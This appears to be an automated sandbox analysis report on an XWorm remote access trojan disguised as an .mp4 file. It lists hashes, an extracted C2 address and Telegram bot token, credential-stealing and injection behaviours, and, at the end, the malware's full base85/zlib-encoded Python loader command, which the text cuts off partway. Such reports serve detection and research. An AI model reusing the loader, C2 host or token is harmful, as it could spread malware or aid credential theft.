xworm | 6855b69e5fbe040daa2fd589b27a8af01906a6dce1e86378e583b07bd8deb218

Analysis

max time kernel
132s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 17:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
Size

104.2MB
MD5

723110b324b4905d3d6bfe963361658c
SHA1

5a8cff10b53be32c8aaef8fae89eec68d6fa2821
SHA256

c57f3bd1eab2436acfb3f0311bfb0279a0bc1ab71bff789a7c4f2b12376aa683
SHA512

ef7118124ff5a7177d1d6f7a1db6d17b44816823cefb0ba85a3391e223ad1b56b8f048dfcc2d9040a858e854645005c70eac40343e037caee5474376bf65ac55
SSDEEP

1572864:cYvDRuqm3HiU2FE3SxJQqGZKr4u3nOlhDZ3nma8La8La8La:cIo53FHixqqGMr4u3OhDZ3d8m8m8m

Score

10^/10

xworm collection discovery rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

merrymerry.zapto.org:25909

Mutex

KfT8ign3kf9CW752

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot8094840865:AAGswv-hfDjO1LeJ7tJ7YmdNOxK_XwZm2Us

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/5084-2488-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk	synaptics.exe

Executes dropped EXE 5 IoCs

pid	Process
4188	synaptics.exe
4636	synaptics.exe
1536	qlw.exe
3612	synaptics.exe
2512	synaptics.exe

Loads dropped DLL 64 IoCs

pid	Process
1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4188	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe
4636	synaptics.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	synaptics.exe
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook	synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
43	raw.githubusercontent.com
44	raw.githubusercontent.com
47	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1536 set thread context of 5084	1536	qlw.exe	101

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	synaptics.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
5084	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5084	AddInProcess32.exe
Token: SeDebugPrivilege	3612	synaptics.exe
Token: SeDebugPrivilege	2512	synaptics.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5084	AddInProcess32.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 1912 wrote to memory of 4188	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	96
PID 1912 wrote to memory of 4188	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	96
PID 1912 wrote to memory of 4188	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	96
PID 1912 wrote to memory of 4636	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	97
PID 1912 wrote to memory of 4636	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	97
PID 1912 wrote to memory of 4636	1912	File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe	97
PID 4636 wrote to memory of 3132	4636	synaptics.exe	98
PID 4636 wrote to memory of 3132	4636	synaptics.exe	98
PID 4636 wrote to memory of 3132	4636	synaptics.exe	98
PID 3132 wrote to memory of 1536	3132	cmd.exe	100
PID 3132 wrote to memory of 1536	3132	cmd.exe	100
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 1536 wrote to memory of 5084	1536	qlw.exe	101
PID 5084 wrote to memory of 3612	5084	AddInProcess32.exe	111
PID 5084 wrote to memory of 3612	5084	AddInProcess32.exe	111
PID 5084 wrote to memory of 3612	5084	AddInProcess32.exe	111
PID 5084 wrote to memory of 2512	5084	AddInProcess32.exe	113
PID 5084 wrote to memory of 2512	5084	AddInProcess32.exe	113
PID 5084 wrote to memory of 2512	5084	AddInProcess32.exe	113

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	synaptics.exe

C:\Users\Admin\AppData\Local\Temp\File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe
"C:\Users\Admin\AppData\Local\Temp\File_Generated_Times20241110.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1912
- C:\winnit\synaptics\synaptics.exe
  "C:/winnit/synaptics/synaptics.exe" -c exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode('c$|eeS#sM*mfU2?vb@w@uBx7DwU#!emInYySq#gPxBy%MlGvFsZ3;kw1c`+Z2(BXaQ{6HBGaqw<s?WZ`oMH~Z8`Kr%YZ8#$u6D%4kb!(JGhc3R&3szqlV1XTSLho#(MSYFVAP6$dl&`L5XL|(gmDlLVFDyVxB)go_y{}-;U?G&;TG5m;bZVPgxg>{gipYe5bl7T5IzM@5sX>S?C0QlG*~lk#q1a0MTjS?&+N~^=k^!ii?F_7eQAFMz6$Y2*4Oqo;F}QNw7#`pf|vGp;5++!@O{{}W&L3P4*V{}A6x%o{|J5z@onq(_Ac19{{a4A?}0sgAMD!);2`XKVjbFl1b?(&fme1CBvIRregvQDN8JQ`2A}^W0gmAd_}O0~;7{;#_yvL|@Jsj=g0JD%@EZjG6@Cj}B8cg+pI^Z5eu)Aceh+^@ErgE2-|6^IF_6*;J@r!*%^u|<$$$AZkN}g6u0PW}UGepfHgp_a^ZP>wH9l5P(@@ujP*29ziIJh;>nE;i!Y<J<Y(+y9iKgNk2tIlsi?8E3l3OQ=B$rxmH){nB?=*5`6OqJOE{DM91#j;9g5!EaA1zc=d?mTDel+bn(6ZJW>fF=2>#rVmGj{sHv>kQa?dslo(;fC5A0bbq3PTA@fp0fSwB|-pYOuxihEyo$*mXjvF#LM^e&F2KN9#wP?vFi3i~dIK0z8hsLZEuvsPH2{N0*Ub5L^BpWrFiAtiHP54i09!o<15Squ!T@?(Y%rB?AAmbw2XFzSFz#zD3oi!89>cY)8Yo7W>Uwo9Ns6u-1QvYxz+a{R#b7F&JCLdy!S*zNHxX^N*{IWqcW1ZoG_q6In)=8-8qwdcKYXb%@|9=#9UO+|$Hj0Xz?C@$<;dGZ;%mRvU;Wg64X?dbHet@rQB0nfL#jXPNjpzI?Qd-S^$o-H&=1$ssO9BR6S3u}u6Fs8NFXHQ=Wgob}g$u}Go`t3UGB8=m6y^mW|Qo%JKdb#(^@GDbp4Zmts$34a|o_4zu=t)qi=d^q;k(f&H28HyKj`M&rL73;XCrJn~33~D>k1p4p9ejoiIx)t4u?L=Qhzl-i8+)IAS{f&n&<bE0z%h0|2HTE*HiXj|1nGlcrkwJ7BMI|~ljQvM^l?b^I4|F0KXMTMVoGiNDaE6YiCllUgxGhJYuD9q$k?fE;dA*7BB~b9>hWCeH>w7_Q91w16eb>-EU!VEwNB8)rM|`5_qt3$wKL)$q3Xi%I{XB})3jg$Au?O!N|G*VL^6!x@QX?4q%a)InIZ&rS$-?dbllI3SwDOB!=sqfXh%0}7_HVHj(#U1(Z;^lxe~bL|An*T--Nd;2ogym;wuY=O_8Rm47;HPL{ylns(2qyiJ`dy{n9jw)2h-S(EWViyz1Qc~P*beY#p{nW$(Xkr4126QV_Wx-?W2~D3=HQ@e^doD%l?O1zl(ZrKIKgOw<7=U!MObx5@z%l^bd~sbK>6Ey{|)k^&SVa|0yW8!~OSdcj);Yq@3RC@Vw!6kpJ`glfX3vTD$Fyl+OPl%Ao5(lmU}QfuLRlVto7QW}ilW<B1lLkDh21LzW*yJ_70BKQuOh@DCch;m4N=<Qrnh%7YLX3tKl49)s}^-$HmCCPMr%ve%8}V?@2}Z!EW$TL^pNKUzLnZX#@Fxr5YXgYmu(&Ttf1^6!HJ3l6`zexxcR{WOh2!dd3t*N1K{JWZ&Xp%6mjOFmtH5m29HI=T~3!cJ)D&jXhHmVM7Zc-9XT&k%jUun+amf)O9vf-z466ZuEedIwFR_ML~$P2?i(5u_mZNI)Kr3tB#odm2!FtUh~?)WgD`3iFvUSG_*`AkTm~qu})0u`T3-cB0$yz(@la{1Y*cMxD9;Le^X7Fu%^>1y+DnzMtm=jO+<iwJMsFz;gLIE1G^t({dS3uqZVJt1Xkta~P8s1Tjw!+G$>zH95+a8<N#za4Myh+PJb{(jtM^ASu=~-bk@{)nv==4Nq0;ifDN)fvQV9<rPfWRz=9u0`zz+Q?D;rjF*f&Ah2{pz)u;Ann{*R@)AQpnVR#w#R;;-AR1ShpJkX7C@RtnMf2VQ+Es(6*byg8YfPC@q=7~7yg>_#>VPf*S}n0N-lk^?W@0Lp!y#_f+7@s{31W>RbE=af#)|F)5+phkBdX;*CX`!KMHCA(={BU+&{O0*!I?0{<FKKMt|Sc%Nii9o#u%3wSTjh70%K<@+MqgU$+;OPRnn}?8l1>V0%6s-0f`B=B{WDk(~_azmf3n?kn<E1D4LnEM8{HuGQAMzKHK8WiGnc|#Y__-(IzB^!W3zQH6#I}1;f-#(E&o0S4(NUy?~5hGK?U>CP%nwwwS94Jk?}{3PG0)h8I|Zmh&^Alrb30DAOg@g=J%`VTK8DW}=#-8SlU<OHyo0sODA7DzpTq&C8UpVD4PBM;JY*&Oy#?(Xu(y78a)4WQM`aId3zbu&87>Gebkksxy6m#F18&8|0^4+3-{nn@du9qDt)<LsV_0aE5U<z*Q5QF}!F2i{c8_Fry1hrNtX1NvxW5S(u8LuxQ&p*(g#9XIJSqX7pJr-)3=Eq9vAY*#=shs_+&w;P@)T&$GVHTX{{G@wCOVZF5*tEzwkQP!&j47DYH=Z6HI3s?bz>%8)prIMCM|jgWYA4vQ?KaU()7Gdx{_172nXq&pm9ETVNM8ZMp+xYZDHF2NAiNG}g33<f4GS(vIethI6XMsmQYA>oo%td4okAJnl~UUJxC8>^N8Ih(6R&;Thm!<NBFpvVjqvW*&cM(~7&6>LayIMW1WrovdPqf=Ik7A;rBt2L$IH$<l@@B(f~_G|`3#t3W+4w$w?_9mcY&6#<Yp)u<Q$ki5~a!(=Q7HZh2Mi-5`Bw1smOO6!SEbfvmEYlEdI8rbc6Gfvg*gmqas?v}_o-Vl_NHH{1s#f?SGiNcDMPmwDk@6A$fr5)uJ?C;#Y1U^KCebMPgjmP|O=9sjakdcUyu<eWl33191ippj%qpDZP6P^^a#$<XUgTxEke$*g>$Hx8BH#B18c7Xl&L;{M+h<EG#RxdVE-ZyL;Z!WLq?$6Pyp+8GDKn)HsCj!JX6g&0ED4mX2xpimS2C)@n#>^2(4;j)eMNv<REx`+yhGRO^Q@v%6fKF=R2A7Nk0c9IFwG7OTQ7=3uJ1Sa1=HjQa0p92tqK~Z4n(&`^l+xg%oxY5w^G%aGyro^01S({R;xFhw#7<{Hknk*u97?fOqF8ibpo(#ilPN#h5>U%vJ~_g(yFi)gKG}MumtjTT$XK+nTcM`TTDtz0b#lj<XoCFv*Uuv)C8Pu!(xRHO0dP4MitsD2_0?0%Xza=67!;%XE@C5>qUk}et2;&+bRndlu*Y;xXO#;I$@aXf+5s}SXIeNjiKNKlGzc@Q)!L2N?^cNk#0_a1!YOVL5s*D4V)F)7~6ujKi7~AOM_gRCvXxLd=K%f0R%18=8b_uQWeoOr!5p0R7=a$u}qU+7&05^LW;FHB3oBV6|5mzlt3Bd+M<OEHtR4BEQ?|lZ9%j-tD0w0OkOJ?yCZ0Vwvc^_l!WvF@nANClz{AurPv~107g}6SQXQ_vrMB5>n$6yY?+Z@i5hZt##N}QFA7-$lv!Le@fJJJ4z*M@)9(A}mgL(k#xyvqU1MZmh$J;&OmohP;;g+eQUckV^5tr&o`N#c(~L;?A~dU<B36qc@&k|rC?<#nR<c-7Y|X?nsI`bpzajZ`p=1%Qp6g4(Yypbwh{lX6XSzd8VDJ_X$B?oNUGfVWAzDKJY|4nD!xVg$FXvk*Qn(tH&a|ZrON-33hD|d-vSd&;04<A+f@74S1qOoP7XZfQ#ez?9a&A$_1sqZ>91=K&;$Mm;0{hKMD#6w{lXcPgo4N?{BCkz&!na!3D5cwM9<2#<*{soKE3FHZD3*;1+8<HJSYCHfeC1iB%T<yq8pyZMNQxN7l-!zDrYz(~aK4l#Xp_cK?92#c2I(s(K@*N>9*Amhh_ywgBFwXM*36PE!os1<QY~BXgpxQ=QCvXrSEB8iEK*Ee;SFD+D!58!D}s<F7%QKaij-OCW8r;+6*6Rns`4!^-x5qqYKbgWA$>~X?)(4gv9R&*&Im841S*0Hs1;d7Lm1qqqd&*O3oCk11`j4b@l)iNSnz!MDH7y1(8V&wgs(&NFx<2iZ)7Owt?$oW^f=$Jh6)_5cc`%w<{fy{y58(rLlwOdk{jSz@LcSKulew9#st^0MtH{#8;9yZ*L<*}&oq6ED7$E$PcLwfys_ixUh%`5D!7P03ohe4swjU&2h{ejk`mt4{LA9i4R_$L`iH%@`tfQpZ4<M)bA0itIT^ltx0^zB*ExXK*Vl4ya@{N)bu&$Sm6nc*+5MzZZQb7N$?3tBn0b}Ix$p_RGq~VWM2Wjo8=l%ppP%^VrFD7QmWy@H=St&pf$N@M^vK;w|4r*+01YpF;oLPkXU);Dn9~|}IWnsqt5-?(>KOCQ+uDhGx?3(BzRJBTp7J&Q+Om>qW^&2SZ<@#Uo%7DT8yp;TID+W5z2@i&9Pei*LtG*u17;1uyEyHn?+(THuMTgj-Tc{VWZ(5ExJx(N18{g?yw9v&U6@nFEUL$6n%_Oq{E|^yiK~Kp{H}O)V#33{&ZK^Aq;JmTQEiqd3vXrRnqiKN+NpDPiCr2F(=6<{a_ddy`m$yh>*f6$c({OOo!6Ax>Fum^loh(?+IYc_g^p4%#%iBSzv&$j$d5R!Qgiw?*Om8b*LND$vyaJTYFcefF(t#E_iAs>hEr<j9#p9Fvy=XKN?hgB`&E0)9=mg=k-0vp)K3{hSb;QO_xs}`*FGS{Zf!2@x~t=>%lAF2)ZHid_J!fX^!trWEs3J#Io-c=Br1DS1PeQt-OnAJshXyqpQPzw%FvHbIC)a2ACiziJL<ikldWB8+C7yzWU>nn4|6wTa7p)j!_Lj+rF<jQ_6Dy+nAZ#b0cf>|zEryv>2kMz4#y|OPW}C=KbPJfoYI$)+1{sY9o{aQ-kUcgW@?t+U5#E{*!bz``MdU_pOyRdE2A^Ww`<mNzG4p<bxF<TGFIco_IPg3=#vhUxuV`2fpc*(oyY@mRJvsa>D;`!eXH+X_b&wNkk-vq;a%hC{gGdJmt4?qPL_Cel{e3B3-hDwWPmqaXOR}z`TG+tD_5pT%j(omr*r0-b7`U3%#^O08Dm+bSLPveyI`!v+tpF0<lpgUa?MC(%?aK;I1sID9q%Q*>d9Cy6m|JkZn&hilX7|QHa%))l%)2~NcWoZ!K_-D^XA?A%ki!=vXknfUA}V9F67=($G<zOibQsx9`VO=<*nLg_s8Aao|eax8D-Y7SEEC@V2j}Pni7f0?&1t;_}gK-TAGbd`nmm{eaI?hz`orZtj4bvSKX4-q>c|NyA7+ds=qH}j&6yv*_HPxC25s%Z;l23OvfAD<QXSwdsU297l-*>P)P3ftB0inAwBDGdt@fdo>nWWovGWW^iejmP*?KcDm`gpo_yWOH#uf`bqw2;-HUgVq0}k7l8WR}WxA*w8P!v4UK5YGq}0GB{<wKo_qnB0sApR|EoaiexG>u0^!=%EP4P$dL#u-CR#Q&uGM%FLhkNFmvVEfI>8pKt#-xSYU3N|#6~|n8(z`39yKZM(0eA03;@zTD=%D!vE4BB2A&rv?C^EM^>mOY=YyJQ)wB8PhK5^46jL$DKY|k%E^LmzQ2<2N=?rQzvwOSq1;#(|7@9!N7H)BtQx%c_0FkYCIfif<hO|swu<4;wknc>}oIVIK4&OM|F%s^t7^&D6<FL9+s_pT%tQ)-M=0S7Rzk;TPnx?9KH>lQW;Q?t7Pb8tL3Zmr(%<G1DhyGo~=DJE~)x$<QbA2?0=<Sv<B$A%-27>tIFcY$0p*c{zheP2(3M<ZkG_bssH={IA2<RhveM66?;4mKBkx7)Y$b*w)GTPR5Ae&5#Di6BS4-X4ur*Bfg3XyknpO!;`KtD~W2>b@5QIWHEjV<;oT>Z@Lmi189(ldJe)QxN{Zx9(gSIr!@!<Y=#<?!A7<f_RUD0P{4=Y7bu*?vp`5YRwA*O_)|%zj)|vj#aC#)%1CoV*=aLzLO%tl!Esp3{zSd61|;ZWRMo}o&`ma_4I<|BY1vK@EQ%gr~EAF`aCFtOkS8nyU)uc|2Z!crfG